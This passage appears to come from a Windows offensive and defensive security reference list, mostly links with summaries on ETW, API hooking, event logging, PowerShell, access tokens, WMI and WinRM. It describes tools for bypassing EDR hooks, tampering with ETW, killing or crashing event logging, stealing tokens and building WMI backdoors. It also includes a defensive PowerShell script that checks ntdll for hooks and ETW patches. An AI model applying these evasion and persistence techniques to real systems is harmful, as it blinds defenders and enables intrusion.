      - My own DPAPI laboratory. Here I put some ongoing works that involve Windows DPAPI (Data Protection API). It's a lab, so something could not work: please see "How to Use".
    - The LaZagne Project
      - LaZagne uses an internal Windows function called CryptUnprotectData to decrypt user passwords. This API should be called in the victim user's session, otherwise it does not work. If the computer has not been started (when the analysis is performed on an offline mounted disk), or if we do not want to drop a binary on the remote host, no passwords can be retrieved. LaZagneForensic has been created to avoid this problem. This work has been mainly inspired by the awesome work done by Jean-Michel Picod and Elie Bursztein for DPAPICK and Francesco Picasso for Windows DPAPI laboratory.
    - DataProtectionDecryptor v1.06 - Nirsoft
- Device Guard
  - 101 *
- ETW
  - 101
    - Event Tracing - docs.ms
    - About Event Tracing - docs.ms
    - Using Event Tracing - docs.ms
    - Writing an Instrumentation Manifest - docs.ms(2018)
      - Applications and DLLs use an instrumentation manifest to identify their instrumentation providers and the events that the providers write. A manifest is an XML file that contains the elements that identify your provider. The convention is to use .man as the extension for your manifest. The manifest must conform to the event manifest XSD.
    - Event Metadata Overview - docs.ms
    - ETW: Event Tracing for Windows 101 - @spotheplanet
    - Introduction to Threat Intelligence ETW - NtRaiseHardError(2020)
    - Windows10EtwEvents
      - Events from all manifest-based and mof-based ETW providers across Windows 10 versions
  - Articles/Blogposts/Writeups
    - Logging Keystrokes with Event Tracing for Windows (ETW) - SRT Team(2016)
    - Hiding Your .NET – ETW - Adam Chester(2020)
    - Another method of bypassing ETW and Process Injection via ETW registration entries - modexp(2020)
    - Data Source Analysis and Dynamic Windows RE using WPP and TraceLogging - Matt Graeber(2019)
    - Hidden Treasure: Intrusion Detection with ETW, Part 1 - Zac Brown(2017)
    - SilkETW: Because Free Telemetry is … Free! - Ruben Boonen
    - Tampering with Windows Event Tracing: Background, Offense, and Defense - Palantir
    - Getting started with Event Tracing for Windows in C# - Alex Khanin
    - ETW Event Tracing for Windows and ETL Files - Nicole Ibrahim
  - Talks/Videos
    - Hidden Treasure: Detecting Intrusions with ETW - Zac Brown(2017)
    - Production tracing with Event Tracing for Windows (ETW) - Doug Cook(2017)
    - ETW - Monitor Anything, Anytime, Anywhere - Dina Goldshtein(NDC Oslo 2017)
      - You'll learn how to diagnose incredibly complex issues in production systems such as excessive garbage collection pauses, slow startup due to JIT and disk accesses, and even sluggishness during the Windows boot process. We will also explore some ways to automate ETW collection and analysis to build self-diagnosing applications that identify high CPU issues, resource leaks, and concurrency problems and produce alerts and reports. In the course of the talk we will use innovative performance tools that haven't been applied to ETW before — flame graphs for visualising call stacks and a command-line interface for dynamic, scriptable ETW tracing. ETW is truly a window into everything happening on your system, and it doesn't require expensive licenses, invasive tools, or modifying your code in any way. It is a critical, first-stop skill on your way to mastering application performance and diagnostics.
  - Tools
    - CollectDotNetEvents.ps1
      - A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
    - krabsetw
      - KrabsETW provides a modern C++ wrapper and a .NET wrapper around the low-level ETW trace consumption functions.
    - PerfView
      - PerfView is a free performance-analysis tool that helps isolate CPU and memory-related performance issues. It is a Windows tool, but it also has some support for analyzing data collected on Linux machines. It works for a wide variety of scenarios, but has a number of special features for investigating performance issues in code written for the .NET runtime.
    - WindowsEventLogMetadata
      - Event metadata collected across all manifest-based ETW providers on Windows 10 1903
      - NiftyETWProviders.json
      - TLGMetadataParser.psm1
        - Retrieves TraceLogging metadata from a file.
    - EtwExplorer
    - SilkETW & SilkService
      - SilkETW & SilkService are flexible C# wrappers for ETW, they are meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While both projects have obvious defensive (and offensive) applications they should primarily be considered as research tools. For easy consumption, output data is serialized to JSON. The JSON data can either be written to file and analyzed locally using PowerShell, stored in the Windows eventlog or shipped off to 3rd party infrastructure such as Elasticsearch.
    - WEPExplorer
      - This tool is very helpful when you want to explore all the Windows Event providers installed on your system and what kind of metadata they have. The Explorer GUI sports a comprehensive filter that helps you sift through a complex provider's metadata.
    - TamperETW
      - PoC to demonstrate how CLR ETW events can be tampered with.
- Faxes & Printers
  - 101
  - Articles/Blogposts/Writeups
- Fibers
  - 101
  - Articles/Blogposts/Writeups
- File Extensions
  - Common file name extensions in Windows - support.ms
  - File Types - docs.ms
    - This topic explains how to create new file types and how to associate your app with your file type and other well-defined file types. Files with a shared common file name extension (.doc, .html, and so on) are of the same type. For example, if you create a new text editor, then you can use the existing .txt file type. In other cases, you might need to create a new file type.
  - The case of the missing file extensions - NCCGroup(2014)
- Hooking in Windows
  - 101
    - Bypass EDR's memory protection, introduction to hooking
    - Windows API Hooking - @spotheplanet
    - The different ways of hooking - Ch40zz(2015)
    - Application Introspection & Hooking With Frida - b33f
    - Hooking - alphaSeclab
    - Defeating Antivirus Real-time Protection From The Inside - Kuba Gretzky(2016)
    - Inline Hooking for Programmers (Part 1: Introduction) - MalwareTech(2015)
    - Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams - @modexpblog
  - Articles/Blogposts/Writeups
    - Why Usermode Hooking Sucks – Bypassing Comodo Internet Security - George Nicolaou(2012)
    - Windows x64 System Service Hooks and Advanced Debugging - nick.p.everdox(2013)
      - This article will explain how we can work alongside PatchGuard to hook system services in a less invasive way, but still retain the powerful aspects behind it.
    - Userland API Monitoring and Code Injection Detection - dtm(2018)
    - Full DLL Unhooking with C++ - @spotheplanet
    - API Monitoring and Hooking for Offensive Tooling - @spotheplanet
    - Detecting Hooked Syscalls - @spotheplanet
      - It is possible to enumerate which Windows API calls are hooked by an EDR that uses the inline patching technique, where a jmp instruction is inserted at the beginning of the syscall stub to be hooked.
    - FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking - Peter Winter-Smith(2020)
    - Adventures in Dynamic Evasion - Matt Hand(2020)
    - User-mode API hooks and bypasses - dumpco.re(2020)
    - SMOOTHPHERRET - generic hooking evasion
    - Hooks-On Hoot-Off: Vitaminizing MiniDump - Adepts of 0xCC
    - WOW64!Hooks: WOW64 Subsystem Internals and Hooking Techniques - Stephen Eckels(2020)
    - Pushing back on userland hooks with Cobalt Strike - Raphael Mudge(2021)
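An added example (my code, not from ired.team or any listed tool) that checks this process's copy of `ntdll.dll` for the two user-mode patches discussed in this section and in the ETW section above: inline hooks on `Nt*` syscall stubs ("Detecting Hooked Syscalls") and a neutered `EtwEventWrite` ("Hiding Your .NET – ETW", "Tampering with Windows Event Tracing"). On x64 an unhooked stub begins `mov r10, rcx; mov eax, <SSN>` (`4C 8B D1 B8 ..`); an inline hook replaces that with a jump, and the usual ETW bypass writes `ret` (`C3`) or `xor eax, eax; ret` (`33 C0 C3`) over the function entry.

```powershell
# Added example: inspect ntdll entry points for inline hooks and ETW patches (x64 only).
if (-not [Environment]::Is64BitProcess) { throw 'Run from 64-bit PowerShell; WOW64 stubs look different' }
Add-Type -Namespace Win32 -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
'@

function Get-NtdllEntryBytes([string]$Name, [int]$Count = 8) {
    # Read the first $Count bytes of an ntdll export from our own address space.
    $ntdll = [Win32.Native]::GetModuleHandle('ntdll.dll')
    $addr  = [Win32.Native]::GetProcAddress($ntdll, $Name)
    if ($addr -eq [IntPtr]::Zero) { throw "ntdll has no export named $Name" }
    0..($Count - 1) | ForEach-Object { [Runtime.InteropServices.Marshal]::ReadByte($addr, $_) }
}

function Test-SyscallStub([string]$Name) {
    $b   = Get-NtdllEntryBytes $Name
    $hex = ($b | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
    $status = if ($hex -like '4C 8B D1 B8*')                               { 'clean' }
              elseif ($b[0] -eq 0xE9)                                      { 'hooked (rel32 jmp)' }
              elseif ($hex -like 'FF 25*' -or $hex -like '48 B8*')         { 'hooked (indirect/abs jmp)' }
              else                                                         { 'unknown prologue' }
    # On a clean stub the system service number is the little-endian immediate after B8.
    $ssn = if ($status -eq 'clean') { $b[4] -bor ($b[5] -shl 8) } else { $null }
    [pscustomobject]@{ Function = $Name; Bytes = $hex; Status = $status; SSN = $ssn }
}

function Test-EtwEventWrite {
    $b   = Get-NtdllEntryBytes 'EtwEventWrite' 4
    $hex = ($b | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
    $patched = ($b[0] -eq 0xC3) -or ($hex -like '33 C0 C3*') -or ($hex -like '31 C0 C3*')
    [pscustomobject]@{ Function = 'EtwEventWrite'; Bytes = $hex; Status = $(if ($patched) { 'patched' } else { 'intact' }); SSN = $null }
}

# Stubs EDRs commonly hook, plus NtClose as a rarely-hooked baseline.
$results = 'NtAllocateVirtualMemory', 'NtProtectVirtualMemory', 'NtWriteVirtualMemory',
           'NtMapViewOfSection', 'NtQueueApcThread', 'NtCreateThreadEx', 'NtClose' |
           ForEach-Object { Test-SyscallStub $_ }
$results + (Test-EtwEventWrite) | Format-Table -AutoSize
```

Two caveats a practitioner should keep in mind: `clean` means "no inline patch at the entry point", not "unmonitored" (an EDR may hook a few instructions in, hook at a different layer, or rely on kernel callbacks instead), and an SSN read this way is only trustworthy when the stub is clean, which is the same trap the unhooking tools further down have to deal with when they rebuild syscall numbers.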
  - Talks/Presentations/Videos
    - Hooking Nirvana: Stealthy Instrumentation Techniques for Windows 10 - Alex Ionescu(REcon2015)
    - Rendering Ransomware Detection and EDR Products Blind - Rene Kolga(BSidesSLC 2020)
    - EPP/EDR Unhooking their protections - Daniel Feichter(DeepSec2020)
      - Slides
      - Enclosed you will find the video of our virtual appearance at the DeepSec 2020 about strengths and weaknesses of EPP/EDR products. In the first step, we go into the basics of the Windows OS architecture. In the second step we take a closer look at two mechanisms which can be used by EPP/EDR products under Windows. Afterwards we look at possibilities how these mechanisms can be bypassed by an attacker. And at the end we also take a short look at what defenders can do to prevent these attacks.
  - Papers
  - C#/.NET
    - Articles/Blogposts/Writeups
    - Tools
      - DotNetHooking
        - Sample use cases of the .NET native code hooking technique
      - PlayHooky
        - PlayHooky is a simple C# class that can be used to hook C# methods at runtime. PlayHooky works on both .NET and Mono of any version, and Unity 4-5+, as long as you are running Windows x86/x64.
      - Loader2
      - Open.WinKeyboardHook
        - A simple and easy-to-use .NET managed wrapper for low-level keyboard hooking.
      - Loader1
        - Nova Hook is an open source VB.NET cheat loader currently built for CS:GO
      - GlobalHook
        - Simple global keyboard and mouse hook and simulation library written in C#
      - DotNetHook
        - A hook proof of concept with no native dependencies. Hook both .NET methods (even framework methods) and native methods entirely in .NET.
      - MonoHook
        - Hook a C# method at runtime without modifying the DLL file (such as UnityEditor.dll)
      - Dendrobate
        - Managed code hooking template.
  - EAT/IAT
    - Import Address Table (IAT) Hooking - @spotheplanet
    - EAT Hooking On DLL's - Jimster480(2007)
    - IAT Hooking Revisited - John Leitch(2011)
      - Import address table (IAT) hooking is a well documented technique for intercepting calls to imported functions. However, most methods rely on suspicious API functions and leave several easy to identify artifacts. This paper explores different ways IAT hooking can be employed while circumventing common detection mechanisms.
    - IAT patcher
      - Article
      - Persistent IAT hooking application (for PE files).
  - Forced-Exception
    - 101
    - Articles/Blogposts/Writeups
  - Inline
  - Interrupt Descriptor Table
  - Input/Output Request Packet
  - Mini-Filters
    - Articles/Blogposts/Writeups
  - Msv
  - System Service Dispatch Table(SSDT)
    - 101
    - Articles/Blogposts/Writeups
  - Usermode APIs
    - Articles/Blogposts/Writeups
  - Un-Hooking
    - Articles/Blogposts/Writeups
    - Talks/Presentations/Videos
    - Tools
      - Memfuck
        - MemFuck: Bypassing User-Mode Hooks - winternl.com
        - A PoC designed to bypass all usermode hooks in a WoW64 environment.
      - UnhookMe
        - UnhookMe is a universal Windows API resolver & unhooker addressing the problem of invoking unmonitored system calls from within your red team's malware
  - Tools
    - Unsorted
      - HookLib
        - The functions interception library written in pure C and NativeAPI with user-mode and kernel-mode support
      - APIunhooker
        - C++ function that will automagically unhook a specified Windows API
      - Crystal Anti-Exploit Protection 2012
      - CoreHook
        - A library that simplifies intercepting application function calls using managed code and the .NET Core runtime
      - NtdllUnpatcher
      - subhook
        - SubHook is a super-simple hooking library for C and C++ that works on Windows, Linux and macOS. It supports x86 only (32-bit and 64-bit).
      - ddimon
        - Monitoring and controlling kernel API calls with stealth hook using EPT
      - hyperbone
        - Minimalistic VT-x hypervisor with hooks
      - KasperskyHook
        - Hook system calls on Windows by using Kaspersky's hypervisor
      - List of API Hook Libraries
      - Juno
        - A Windows managed method detouring library that supports both x86 and x64 detours.
      - mhook(2014)
      - InfinityHook
      - minhook
      - PolyHook
      - PolyHook 2.0
      - Probatorum EDR Userland Hook Checker
        - Probatorum will check which Nt/Zw functions your local EDR is hooking. Most credit for this code goes to SolomonSklash, who has great blogs on a variety of security topics (https://www.solomonsklash.io). He wrote most of this code; I just cleaned it up a bit.
      - ScyllaHide
        - Advanced usermode anti-anti-debugger.
-
Windows Kernel Operations
- 101
- Articles/Blogposts/Writeups
- Tools
-
LNK Files
-
101
-
[MS-SHLLINK]: Shell Link (.LNK) Binary File Format - docs.ms
- Specifies the Shell Link Binary File Format, which contains information that can be used to access another data object. The Shell Link Binary File Format is the format of Windows files with the extension "LNK".
-
Windows Shortcut File format specification - liblnk
- This document is intended as a working document for the Windows Shortcut File (LNK) format specification. Which should allow existing Open Source forensic tooling to be able to process this file type.
-
[MS-SHLLINK]: Shell Link (.LNK) Binary File Format - docs.ms
-
Articles/Blogposts/Writeups
- You down with LNK? - Nathan Drier(2012)
- Tracking threat actors through .LNK files - Michel Coene(2017)
- .LNK downloader and bitsadmin.exe in malicious Office document - Michel Coene(2017)
- Pwned by a Shortcut - Tom Melo(2018)
- Persistence – Shortcut Modification - Pentestlab.blog(2019)
- Deep Dive: A LNK in the Chain - John Ferrell(2019)
- Analyzing the Windows LNK file attack method - 0xd3xt3r(2019)
- Suspected Sapphire Mushroom (APT-C-12) malicious LNK files - @mattnotmax(2020)
- LNK & ISESteroids Powershell dropper - Max Kersten(2020)
- The Missing LNK — Correlating User Search LNK files - Ashley Frazer(2020)
- Using Shell Links as zero-touch downloaders and to initiate network connections - Jan Kopriva(2020)
- CVE-2020-0729: Remote Code Execution Through .LNK Files - Trend Micro Research Team(2020)
- Talks/Presentations/Videos
-
Papers
-
The Meaning of Linkfiles In Forensic Examinations - Harry Parsonage(2010)
- A look at the practical value to forensic examinations of dates and times, and object identifiers in Windows shortcut files.
- Tools
-
Logging
- See L-SM-TH.md
- Articles/Blogposts/Writeups
-
Tools
-
Invoke-Phant0m
- This script walks the thread stacks of the Event Log Service process (a specific svchost.exe), identifies the Event Log threads, and kills them. The system will then be unable to collect logs while the Event Log Service still appears to be running.
-
GENE: Go Evtx sigNature Engine
- The idea behind this project is to provide an efficient and standard way to look into Windows Event Logs (a.k.a EVTX files). For those who are familiar with Yara, it can be seen as a Yara engine but to look for information into Windows Events.
- Documentation
-
LogServiceCrash
- POC code to crash Windows Event Logger Service
-
SharpCrashEventLog
- C# port of LogServiceCrash
-
EventCleaner
- A tool mainly to erase specified records from Windows event logs, with additional functionalities.
-
MS-SQL Server
- 101
- Articles/Blogposts/Writeups
-
Tools
-
DAFT: Database Audit Framework & Toolkit
- This is a database auditing and assessment toolkit written in C# and inspired by PowerUpSQL.
-
Evil SQL Client (ESC)
- Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, b…
-
QuickSQL
- QuickSQL is a simple MSSQL query tool that allows you to connect to MSSQL databases and does not require administrative level rights to use.
-
SqlClient
- POC for .NET mssql client for accessing database data through beacon
- Named Pipes
-
PowerShell
-
PowerShell Logging
- 101
- Articles/Blogposts/Writeups
-
Tools
-
DisablePSLogging.cs
- One of the many ways one could disable PS logging/AMSI if there's prior code execution.
-
PowerShell Profiles
-
101
- Understanding the Six PowerShell Profiles - Dr Scripto(devblogs.ms)
- About Profiles - docs.ms(2017)
- How-to: Configure the PowerShell startup profile [$Profile] - ss64.com
- Understanding different (Six and more!) PowerShell profiles - Mohit Goyal
- PowerShell for Beginners (Part 6): PowerShell Profiles and the ISE - Patrick Gruenauer
-
Articles/Blogposts/Writeups
- Abusing PowerShell Profiles - enigma0x3(2014) (https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/)
- Investigating Subversive PowerShell Profiles - Matt Graeber(2015)
- Persistence – PowerShell Profile - PentestLab.blog(2019)
- Persistent PowerShell: The PowerShell Profile -
-
PowerShell without PowerShell
- 101
- Articles/Blogposts/Writeups
-
Custom Runspace
- Executing PowerShell scripts from C# - docs.ms
- Calling C# code in Powershell and vice versa - Karthik Kk
- How to run PowerShell Core scripts from .NET Core applications - keithbabinec(2020)
- How to execute PowerShell script or cmdlets from C# code? - Mitesh Sureja(2018)
- Project: NotPowerShell
- We don’t need powershell.exe - decoder.cloud(2017)
- Powershell CLM Bypass Using Runspaces - Shaksham Jaiswal(2019)
-
Tools
-
InsecurePowerShell
- InsecurePowershell is a fork of PowerShell Core v6.0.0, with key security features removed.
-
InsecurePowerShellHost
- InsecurePowerShellHost is a .NET Core host process for InsecurePowerShell, a version of PowerShell Core with key security features removed.
-
PowerTools
- This project focuses on allowing the execution of PowerShell functionality without the use of PowerShell.exe. Primarily this project uses .NET assemblies/libraries to start execution of the PowerShell scripts.
-
UnmanagedPowerShell
- Executes PowerShell from an unmanaged process.
-
PowerShdll
- Run PowerShell with dlls only.
-
NoPowerShell
- NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll,main.
-
A Powerful New Tool: PowerLine - BHIS(2017)
- PowerLine
- Running into environments where the use of PowerShell is being monitored or is just flat-out disabled? Have you tried out the fantastic PowerOps framework but are wishing you could use something similar via Meterpreter, Empire, or other C2 channels? Look no further! In this talk, Brian Fehrman talks about his new PowerLine framework. He overviews the tool, walks you through how to use it, shows you how you can add additional PowerShell scripts with little effort, and demonstrates just how powerful (all pun intended) this little program can be!
-
psfire
- simple demo of using C# & System.Management.Automation.dll to run powershell code (b64 encoded) without powershell.exe
-
PowerShell Desired State Configuration
- Documentation
- DSCompromised: A Windows DSC Attack Framework - Matt Hastings, Ryan Kazanciyan - BH Asia16
-
DSCompromised
- PowerShell framework for managing and infecting systems via Windows Desired State Configuration (DSC). DSC is a built-in feature in Windows Management Framework 4.0 (PowerShell v4) and is installed natively on Windows operating systems beginning with Server 2012 R2 and Windows 8.1.
-
Privileges
-
101
-
Privilege Constants (Authorization) - docs.ms
- Privileges determine the type of system operations that a user account can perform. An administrator assigns privileges to user and group accounts. Each user's privileges include those granted to the user and to the groups to which the user belongs.
-
Services
-
101
-
About Services - docs.ms
- The service control manager (SCM) maintains a database of installed services and driver services, and provides a unified and secure means of controlling them. The database includes information on how each service or driver service should be started. It also enables system administrators to customize security requirements for each service and thereby control access to the service.
-
Service Control Handler Function - docs.ms
- Each service has a control handler, the Handler function, that is invoked by the control dispatcher when the service process receives a control request from a service control program. Therefore, this function executes in the context of the control dispatcher.
- Articles/Blogposts/Writeups
-
Tools
-
ExploitRemotingService
- A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects might work in Mono on *nix.
-
Windows Privileges & Tokens
-
101
- Access token - Wikipedia
-
Access Tokens - docs.ms
- An access token is an object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the process or thread. When a user logs on, the system verifies the user's password by comparing it with information stored in a security database. If the password is authenticated, the system produces an access token. Every process executed on behalf of this user has a copy of this access token. The system uses an access token to identify the user when a thread interacts with a securable object or tries to perform a system task that requires privileges.
- Credentials Processes in Windows Authentication - docs.ms
- How Access Tokens Work - docs.ms
-
Articles/Blogposts/Writeups
- Introduction to Windows tokens for security practitioners - Will Burgess(2020)
- About Windows Process/Thread Tokens and Pass The Hash - Kevin Dick(2019)
- Windows Privilege Abuse: Auditing, Detection, and Defense - Palantir(2019)
- Token Manipulation Attacks (Part 1: Introduction to Tokens and Privileges) - Susan Ghosh(2019)
-
Give Me Back My Privileges! Please? - itm4n(2019)
- I want to tell you the story of a service account which lost all its powers (a.k.a. privileges). Windows world is getting increasingly ruthless and when the system considers you are not worthy, this is what happens. Fortunately for our service account, all is not lost, there’s still hope. In this merciless world, you can always turn to the old sages to find some comfort and support. Among them, the Task Scheduler might be willing to help and restore what was lost, provided that you ask kindly…
- Accessing Access Tokens for UIAccess - James Forshaw(2019)
- Sharing a Logon Session a Little Too Much - James Forshaw(2020)
- Understanding and Abusing Process Tokens — Part I - seemant bisht(2020)
- The impersonation game - decoder.cloud(2020)
- Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N) - James Forshaw(2020)
- Game Over Privileges - Acebond(2020)
-
Talks/Presentations/Videos
-
Abusing Access Tokens for UAC Bypasses - James Forshaw(ZeroNights18)
- UAC, specifically Admin-Approval mode, has been known to be broken ever since it was first released in Windows Vista. Most of the research of bypassing UAC has focused on abusing bad elevated application behavior, auto elevation or shared registry and file resources. However, UAC was fundamentally broken from day one due to the way Microsoft implemented the security around elevated processes, especially their access tokens. This presentation will go into depth on why this technique works, allowing you to silently gain administrator privileges if a single elevated application is running. It will describe how Microsoft tried to fix it in Windows 10, and how you can circumvent their defences. It will also go into detail on a previously undocumented technique to abuse the assumed, more secure, Over-The-Shoulder elevation on Windows 10.
-
Understanding Windows Access Token Manipulation - Justin Bui(Hushcon2019)
- Finding alternatives to winlogon.exe to steal SYSTEM access tokens from.
-
The Backup Operators Guide to the Galaxy - Dave Mayer
- Backup Operator accounts are ubiquitous and often overlooked by both blue and red teams. These accounts have abusable permissions and are rarely maintained properly. In this talk we will examine and demonstrate novel techniques to stealthily compromise Active Directory through the Backup Operator's account. We will use the Backup Operator account to gain local Admin privilege, establish persistence, and pivot laterally throughout a domain. However, all is not lost in that we can further lockdown our systems and enable auditing measures to deter and detect these attacks.
- Papers
-
Tools
-
PrimaryTokenTheft
- Steal a primary token and spawn cmd.exe using the stolen token.
- One Token to Rule Them All: Post-Exploitation Fun in Windows Environments - Luke Jennings
- Token Kidnapping's Revenge -
-
FullPowers
- FullPowers is a Proof-of-Concept tool I made for automatically recovering the default privilege set of a service account including SeAssignPrimaryToken and SeImpersonate.
-
Windows Communication Foundation
- 101
-
Articles/Blogposts/Writeups
- Windows Communication Foundation(WCF) FAQ: Part I - Shivprasad(C#Corner)
- Abusing Insecure Windows Communication Foundation (WCF) Endpoints - Fabius Watson
- Exploitation of Remote WCF Vulnerabilities - Versprite
- Abusing WCF Endpoints for Fun and Profit
- Finding and Exploiting .NET Remoting over HTTP using Deserialisation - Soroush Dalili
- Talks/Presentations/Videos
-
Windows Management Instrumentation
- 101
-
Official Documentation
- WMI Reference - docs.ms
- Introduction to CIM Cmdlets - MS
- A Description of the Windows Management Instrumentation (WMI) Command-Line Utility (Wmic.exe) - support.ms
- wmic - docs.ms
- WMIC - Take Command-line Control over WMI - docs.ms
- Using Windows Management Instrumentation Command-line - docs.ms(2009)
- WMI Classes - docs.ms
- Access to WMI Namespaces - docs.ms
- WMI Tasks: Accounts and Domains - docs.ms
- WMI Tasks -- Services - docs.ms
- WMI Tasks: Files and Folders - docs.ms
- Search for files using WMI - Jaap Brasser
- Using the PowerShell CIM cmdlets for fun and profit - Dr Scripto
- Use PowerShell and WMI to Get Processor Information - Dr Scripto
- Using the Get-Member Cmdlet - docs.ms
- Get-Process - docs.ms
-
General
- (Book) Understanding WMI Scripting: Exploiting Microsoft's Windows Management Instrumentation in Mission-Critical Computing Infrastructures - Alain Lissoir
-
Articles/Blogposts/Writeups
- Examples of WMIC commands for Windows .NET SERVER Family - cs.cmu.edu(2002)
- WMIC Command Line Kung-Fu - tech-wreck.blogspot.com(2009)
- WMIS: The Missing Piece of the Ownage Puzzle - Christopher Campbell, Exorcyst(2013)
- PowerShell and Events: WMI Temporary Event Subscriptions - Boe Prox(2013)
- Introduction to WMI Basics with PowerShell Part 1 (What it is and exploring it with a GUI) - Carlos Perez(2013)
- Thoughts on Exploiting a Remote WMI Query Vulnerability - Matt Graeber(2015)
-
WMI Process Watcher - Vault7 Leaks
- A technique to asynchronously detect when a process is created using WMI.
- WMI object correlation using 'ASSOCIATORS OF' - Matt Graeber(2015)
- Creeping on Users with WMI Events: Introducing PowerLurk - Sw4mp_f0x(2016)
- A Brief Usage Guide for Wmic - xorrior(2016)
- Getting Started with WMI Weaponization – Part 2 - Alexander Leary
- Getting Started with WMI Weaponization – Part 5 - Alexander Leary(2017)
- Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY) - Matthew Dunwoody(2017)
- Lateral Movement Using WinRM and WMI - Tony Lambert(2017)
- Post Exploitation Using WMIC (System Command) - hackingarticles.in(2018)
- Windows Userland Persistence Fundamentals - FuzzySecurity
- Detecting & Removing an Attacker’s WMI Persistence - David French(2018)
- An intro into abusing and identifying WMI Event Subscriptions for persistence - @rebootuser(2019)
- Papers
-
Presentations/Talks/Videos
- WMI Attacks From Theory To Practice -
-
Abusing Windows Management Instrumentation (WMI) - Matthew Graeber(BH USA 2015)
- Imagine a technology that is built into every Windows operating system going back to Windows 95, runs as System, executes arbitrary code, persists across reboots, and does not drop a single file to disk. Such a thing does exist and it's called Windows Management Instrumentation (WMI). With increased scrutiny from anti-virus and 'next-gen' host endpoints, advanced red teams and attackers already know that the introduction of binaries into a high-security environment is subject to increased scrutiny. WMI enables an attacker practicing a minimalist methodology to blend into their target environment without dropping a single utility to disk. WMI is also unlike other persistence techniques in that rather than executing a payload at a predetermined time, WMI conditionally executes code asynchronously in response to operating system events. This talk will introduce WMI and demonstrate its offensive uses. We will cover what WMI is, how attackers are currently using it in the wild, how to build a full-featured backdoor, and how to detect and prevent these attacks from occurring.
-
Building Better Backdoors with WMI - Alexander Leary(Derbycon2017)
- This presentation will provide a brief overview of WMI, and how creating WMI providers can be leveraged to create a reliable and covert persistence mechanism for offensive security professionals to use.
-
Basic Offensive Application of MOF Files in WMI Scripting - Devon Bordonaro(BSidesCharm2018)
- A basic introduction on how to use MOF files and the Windows Management Instrumentation (WMI) database to alter how programs execute and implement your own processes. Join us for a walkthrough of MOF design and an overview of the vulnerabilities presented by the WMI database. Finally, learn how the hardest part of using MOF files is making yourself known to the user.
-
Fud WMI for lateral movement (PoC) - BsidesDub 2019
- This repository contains the PowerShell WMI based Proof of Concept for advanced lateral movement as presented at BsidesDub 2019. The main goal of this project was to demonstrate the techniques an attacker might use to bypass detection mechanisms using many techniques in real-life conditions. It implements a random class name derivation mechanism, payload obfuscation, in-memory execution without any call to IEX nor IWR for the stage 1 dropper, and an EventViewer logs removal through the WMI un-subscription method.
- Reference
-
Tools
-
WMI_Backdoor
- A PoC WMI backdoor presented at Black Hat 2015
-
cme-wmi
- Experimental plugin for CrackMapExec that adds a new protocol based on pure WMI: all of CrackMapExec's traffic passes via DCOM (TCP/135 and dynamic ports).
-
WMIOps
- This repo is for WMIOps, a powershell script which uses WMI for various purposes across a network.
-
WMImplant
- This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based.
-
Windows Notification Facility
- 101
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet - Alex Ionescu, Gabrielle Viala
- Slides
- All Windows researchers know about RPC and ALPC, and the attack surface provided through the kernel's system call layer. As they know about shared memory, the object manager, the registry, and countless other more 'creative' kernel mechanisms which allow cross-process data sharing and communication, such as raw ETW or atom tables.
-
Tools
-
wnfun
- WNF Utilities 4 Newbies (WNFUN) is the repository for the Python scripts and C tools that Gabrielle Viala (@pwissenlit) and Alex Ionescu (@aionescu) wrote for their BlackHat 2018 presentation on the Windows Notification Facility.
-
Windows Remote Management
-
101
- Windows Remote Management - Wikipedia
-
Windows Remote Management - docs.ms
- Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate. The WS-Management protocol specification provides a common way for systems to access and exchange management information across an IT infrastructure. WinRM and Intelligent Platform Management Interface (IPMI), along with the Event Collector are components of the Windows Hardware Management features.
- Installation and configuration for Windows Remote Management - docs.ms
- winrs - docs.ms
-
Articles/Blogposts/Writeups
- WinRM is my Remote Access Tool - Raphael Mudge(2015)
- Lateral Movement – WinRM - Pentestlab.blog(2018)
- Group Policies: Enabling WinRM for Windows Client Operating Systems (Windows 10, Windows 8, Windows 7) - Patrick Gruenauer(2018)
- Hacking Windows Remote Management (WinRM) - Securethelogs(2019)
- WinRM - JPCert
- WinRM Penetration Testing - Raj Chandel(2020)
- Evil-Winrm : Winrm Pentesting Framework - Raj Chandel(2020)
- Talks/Presentations/Videos
-
Tools
-
WinRb/WinRM
- Ruby library for Windows Remote Management
-
Windows Sandbox
- 101
- Articles/Blogposts/Writeups
-
Windows Scripting Host
-
101
- Windows Scripting Host - Wikipedia
-
Windows Script Host - docs.ms
- The following sections provide information about Windows Script Host along with a reference section that documents the object model.
-
wscript - docs.ms
- Windows Script Host provides an environment in which users can execute scripts in a variety of languages that use a variety of object models to perform tasks.
-
Scripting - docs.ms
